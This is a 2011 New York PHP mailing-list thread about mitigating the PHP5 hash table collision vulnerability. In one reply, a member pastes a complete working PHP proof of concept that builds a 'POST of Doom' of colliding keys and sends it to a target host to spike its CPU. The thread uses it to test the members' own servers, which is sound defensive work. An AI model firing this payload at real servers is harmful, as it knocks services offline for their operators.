Ben,
Thanks for the reply. I ran the PoC below against my servers and it looks like we are in ok shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post|request variables. Dur... Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486. Have a great new years! Hans Kaspersetz Cyber X Designs http://cyberxdesigns.com From: talk-boun...@lists.nyphp.org [mailto:talk-boun...@lists.nyphp.org] On Behalf Of Ben Sgro Sent: Thursday, December 29, 2011 11:33 AM To: NYPHP Talk Subject: Re: [nyphp-talk] Hash Table Vulnerability in PHP5 Hey, Don't allow posts w/> ~100 k/v pairs. Don't allow larger uploads then is necessary. As you mentioned, I guess limit script execution time. Right now, there's some snort signatures going around (Not sure if you run IDS, etc). I've also heard people mention a mod_rewrite regex to strip out these bads chars. I have a PoC here you can test against your servers: (And here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html) <?php // v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision // // generate POST of Doom function doom() { // entries with collisions in PHP hashtable hash function $a = array( '0' => 'Ez', '1' => 'FY', '2' => 'G8', '3' => 'H' . chr(23), '4' => 'D'.chr(122+33), ); // how long should the payload be $length = 7; $size = count($a); $post = ''; $max = pow($size,$length); for ($i = 0; $i < $max; $i++) { $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT); $post .= '' . (urlencode(strtr($s, $a))) . '=&'; } return $post; } // hashcollider.php // by sk $post = doom(); $ch = curl_init(); $args = getopt("h:"); $host = $args['h']; curl_setopt($ch, CURLOPT_URL, $host); curl_setopt($ch, CURLOPT_POST, 1 ); curl_setopt($ch, CURLOPT_POSTFIELDS, $post); printf("[x] Target: %s\n", $host); printf("[x] CPU spike!\n"); $result=curl_exec ($ch); printf("[x] Payload sent.\n"); Good luck! - Ben On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote: Good morning, I hope everyone has seen the news about the Hash Table Vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos- massive-scale or here http://www.kb.cert.org/vuls/id/903934. It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, with all release candidates they are strongly advising against using it in production. What is the general consensus for mitigating this risk without moving to RC5? We are limiting the execution time of our scripts, however for upload scripts or processing intensive scripts we need to increase the execution time which I image would leave those scripts more vulnerable. Thanks, Hans Kaspersetz Cyber X Designs http://cyberxdesigns.com _______________________________________________ New York PHP Users Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/Show-Participation
_______________________________________________ New York PHP Users Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/Show-Participation